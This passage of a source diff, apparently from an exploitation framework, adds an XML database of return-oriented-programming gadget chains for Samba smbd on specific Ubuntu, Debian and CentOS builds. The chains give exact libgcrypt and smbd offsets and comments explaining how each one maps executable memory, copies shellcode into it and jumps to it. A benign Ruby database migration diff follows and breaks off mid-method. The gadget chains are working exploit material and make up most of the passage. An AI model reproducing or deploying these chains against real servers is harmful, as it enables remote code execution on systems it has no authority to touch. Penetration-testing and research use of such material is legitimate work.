+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x00060a1a">pop esi ; ret</gadget>
+                <gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
+                <gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
+                <gadget offset="0x00063dbf">pop eax ; ret</gadget>
+                <gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00055743">xchg eax, ebx ; ret ||  ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00071b6c">memcpy@got - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00055743">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <!-- set ecx to same value than edx -->
+                <gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
+                <gadget offset="0x0005c914"> xchg eax, ecx ; ret  ;  || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006e61f"> xchg eax, esi ; ret  ; || restore eax</gadget>
+                <gadget offset="0x00060a1a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0005b68a">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+
+
+
+
+</rop>
+<rop>
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
+            <target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcr
+        ii  libgcrypt11                        1.5.0-1                                 LGPL Crypto library - runtime library
+        b69e3000-b6a65000 r-xp 00000000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        b6a65000-b6a66000 r**p 00081000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        b6a66000-b6a68000 rw-p 00082000 08:01 148828     /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x000048ee">pop ebx ; ret</gadget>
+                <gadget offset="0x00082ff4">offset of .got.plt section</gadget>
+                <gadget offset="0x0006933f">pop eax; ret</gadget>
+                <gadget offset="0x000830a4">mmap@got - 4</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00007d79">jmp eax</gadget>
+                <gadget offset="0x00005646">add esp, 0x1C;  ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00084000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget offset="0x00008532">xchg eax, ecx ; ret ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006933f">pop eax ; ret</gadget>
+                <gadget offset="0x00084100">eax =  writable location, in GOT</gadget>
+                <gadget offset="0x000048ee">pop ebx ; ret</gadget>
+                <gadget offset="0x00084100">ebx =  writable location, in GOT</gadget>
+                <gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebx</gadget>
+                <gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
+                <gadget value ="0x00000000">junk for edi</gadget>
+                <gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
+                <gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0006933f">pop eax; ret</gadget>
+                <gadget offset="0x00083024">memcpy@got - 4</gadget>
+                <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0001ffef">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x00004803">pop esi ; ret</gadget>
+                <gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0001fdfa">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+</rop>
+<rop>
+	<compatibility>
+            <target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcr
+        ii  libgcrypt11                        1.4.6-4ubuntu2                     LGPL Crypto library - runtime library
+        b69f8000-b6a69000 r-xp 00000000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+        b6a69000-b6a6a000 r**p 00070000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+        b6a6a000-b6a6c000 rw-p 00071000 08:01 17571      /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+
+        we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
+        4 first pops are after pop esp
+        -->
+        <gadgets base="0">
+                <gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">esi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x00072010">mmap@got - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00007f19">jmp eax</gadget>
+                <gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0005d903">xchg eax, edx ; ret ||  edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
+                <gadget offset="0x0005c45c">pop ecx ; ret</gadget>
+                <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
+                <gadget offset="0x0005cd54">xchg eax, ecx ; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000641ff">pop eax; ret</gadget>
+                <gadget offset="0x0007204c">memcpy@got - 4</gadget>
+                <gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0005c6e9">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x00060e5a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0005baca">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
+        </compatibility>
+
+        <!--
+        dpkg -l|grep libgcrypt
+        ii  libgcrypt11                        1.4.5-2ubuntu1                    LGPL Crypto library - runtime library
+        b6a20000-b6a91000 r-xp 00000000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        b6a91000-b6a92000 r**p 00070000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        b6a92000-b6a94000 rw-p 00071000 08:01 17247      /lib/libgcrypt.so.11.5.3
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
+                <gadget offset="0x00071ff4">offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072010">mmap@got - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x0000922c">jmp eax</gadget>
+                <gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off_t </gadget>
+                <gadget value ="0x00000000">junk to be skipped over</gadget>
+                <gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
+                <gadget offset="0x00073000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x00060e7a">pop esi ; ret</gadget>
+                <gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
+                <gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
+                <gadget offset="0x0006421f">pop eax ; ret</gadget>
+                <gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00043999">xchg eax, ebx ; ret ||  ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072094">memcpy@got - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00043999">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <!-- set ecx to same value than edx -->
+                <gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
+                <gadget offset="0x0006421f">pop eax; ret</gadget>
+                <gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
+                <gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
+                <gadget offset="0x0005cd74"> xchg eax, ecx ; ret  ;  || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x0006ea7f"> xchg eax, esi ; ret  ; || restore eax</gadget>
+                <gadget offset="0x00060e7a">pop esi ; ret</gadget>
+                <gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
+                <gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget> 
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x000128cc">pushad  ; ret || will ret on gadget (P) which was in edi</gadget>
+                <gadget value ="size">payload size</gadget>
+	</gadgets>
+
+
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>3.5.10-0.107.el5 on CentOS 5</target>
+        </compatibility>
+
+        <!--
+        yum list |grep libgcrypt
+        libgcrypt.i386                           1.4.4-5.el5                   installed
+        02c63000-02ce1000 r-xp 00000000 fd:00 929390     /usr/lib/libgcrypt.so.11.5.2
+        02ce1000-02ce4000 rwxp 0007d000 fd:00 929390     /usr/lib/libgcrypt.so.11.5.2
+        section is writable and executable, we'll copy the shellcode over there instead of using mmap
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
+                <gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
+                <gadget value ="0x00000000">esi = junk to be skipped over</gadget>
+                <gadget value ="0x00000000">edi = junk to be skipped over</gadget>
+                <gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
+                <gadget offset="0x0006299c">pop ecx ; ret</gadget>
+                <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
+                <gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
+                <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
+                <gadget offset="0x0006a73f">pop eax ; ret</gadget>
+                <gadget offset="0x0007effc">memcpy@got - 4</gadget>
+                <gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
+                <gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
+                <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
+                <gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x0006299c">pop ecx ; ret</gadget>
+                <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
+                <gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
+                <gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
+                <gadget value ="0x00000000">junk for ebp **1**</gadget>
+                <gadget offset="0x0006200a">pushad ; ret</gadget>
+                <gadget value ="size">payload size</gadget>
+        </gadgets>
+
+
+    </rop>
+
+
+
+
+
+    <!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2   
+
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
+	</compatibility>
+
+        <gadgets base="0">
+                <gadget offset="0x0000f3b1">pop eax; ret</gadget>
+                <gadget offset="0x00991ff0">mmap64@got</gadget>
+                <gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x008c8997">jmp eax</gadget>
+                <gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x0034fbd2">pop edx ; ret</gadget>
+                <gadget offset="0x0099a000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x0034c2bc">mov dword [edx], eax ;  ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for esi</gadget>
+                <gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
+                <gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x001a73b2">add ebx, ebp ; ret   || ebx = src in memcpy</gadget>
+                <gadget offset="0x0008c5ac">pop eax; ret</gadget>
+                <gadget offset="0x00991904">memcpy@got</gadget>
+                <gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x001726b5">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0002ab2c">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+        </gadgets>
+
+
+     ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
+	<compatibility>
+            <target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
+        </compatibility>
+
+        <gadgets base="0">
+                <gadget offset="0x0000f445">pop eax; ret</gadget>
+                <gadget offset="0x008c1008">mmap64@got</gadget>
+                <gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x0009e8e4">jmp eax</gadget>
+                <gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x001f6142">pop edx ; ret</gadget>
+                <gadget offset="0x008c9000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
+                <gadget offset="0x00277540">pop ebp ; ret</gadget>
+                <gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
+                <gadget offset="0x0000f445">pop eax; ret</gadget>
+                <gadget offset="0x008c0964">memcpy@got</gadget>
+                <gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0000cdea">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x0000dbcf">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+            </gadgets>
+        -->
+        <!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6 
+	<compatibility
+            <target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
+	</compatibility>
+        <gadgets base="0">
+                <gadget offset="0x00021cd9">pop eax; ret</gadget>
+                <gadget offset="0x008cf86c">mmap64@got</gadget>
+                <gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
+                <gadget offset="0x000234e5">jmp eax</gadget>
+                <gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
+                <gadget value ="0xffffffff">mmap arg : filedes </gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
+                <gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
+                <gadget offset="0x0001cf12">pop edx ; ret</gadget>
+                <gadget offset="0x008d6000">edx =  writable location, in GOT</gadget>
+                <gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; ||  save EAX (mmaped addr) in GOT</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret  ||  ecx = MMAPed addr, dst in memcpy</gadget>
+                <gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
+                <gadget value ="0x00000000">junk for ebp</gadget>
+                <gadget offset="0x00394107">pop ebp ; ret</gadget>
+                <gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
+                <gadget offset="0x0017892d">add ebx, ebp ; ret   || ebx = src in memcpy</gadget>
+                <gadget offset="0x00021cd9">pop eax; ret</gadget>
+                <gadget offset="0x008cf1e8">memcpy@got</gadget>
+                <gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
+                <gadget offset="0x0001f666">xchg eax, ebx ; ret  || eax = src in memcpy , ebx = @memcpy</gadget>
+                <gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
+                <gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
+                <gadget value ="0x00000000">junk for ebp **1** </gadget>
+                <gadget offset="0x00020453">pushad, ret</gadget>
+                <gadget value ="size">payload size</gadget>
+            </gadgets>
+            -->
+</db>

data/sql/migrate/20110422000000_convert_binary.rb

@@ -4,37 +4,42 @@ class ConvertBinary < ActiveRecord::Migration
 	class WebPage < ActiveRecord::Base
 		serialize :headers
 	end
-	
+
 	class WebVuln < ActiveRecord::Base
 		serialize :params
 	end
-		
+
 	def bfilter(str)
 		str = str.to_s
 		str.encoding = 'binary' if str.respond_to?('encoding=')
 		str.gsub(/[\x00\x7f-\xff]/, '')
 	end
-	
+
 	def self.up
 		rename_column :web_pages, :body, :body_text
 		rename_column :web_pages, :request, :request_text
 		rename_column :web_vulns, :request, :request_text
 		rename_column :web_vulns, :proof, :proof_text
-							
+
 		add_column :web_pages, :body, :binary
 		add_column :web_pages, :request, :binary
-		add_column :web_vulns, :request, :binary	
+		add_column :web_vulns, :request, :binary
 		add_column :web_vulns, :proof, :binary
-		
+
 		WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
 		WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
 		WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
 		WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
-				
+
 		remove_column :web_pages, :body_text
 		remove_column :web_pages, :request_text
 		remove_column :web_vulns, :request_text
 		remove_column :web_vulns, :proof_text
+
+		WebPage.connection.schema_cache.clear!
+		WebPage.reset_column_information
+		WebVuln.connection.schema_cache.clear!
+		WebVuln.reset_column_information
 	end
 
 	def self.down
@@ -43,21 +48,25 @@ class ConvertBinary < ActiveRecord::Migration
 		rename_column :web_pages, :request, :request_binary
 		rename_column :web_vulns, :request, :request_binary
 		rename_column :web_vulns, :proof, :proof_binary
-							
+
 		add_column :web_pages, :body, :text
 		add_column :web_pages, :request, :text
 		add_column :web_vulns, :request, :text
 		add_column :web_vulns, :proof, :text
-		
+
 		WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
 		WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
 		WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
 		WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
-				
+
 		remove_column :web_pages, :body_binary
 		remove_column :web_pages, :request_binary
 		remove_column :web_vulns, :request_binary
 		remove_column :web_vulns, :proof_binary
-			
+
+		WebPage.connection.schema_cache.clear!
+		WebPage.reset_column_information
+		WebVuln.connection.schema_cache.clear!
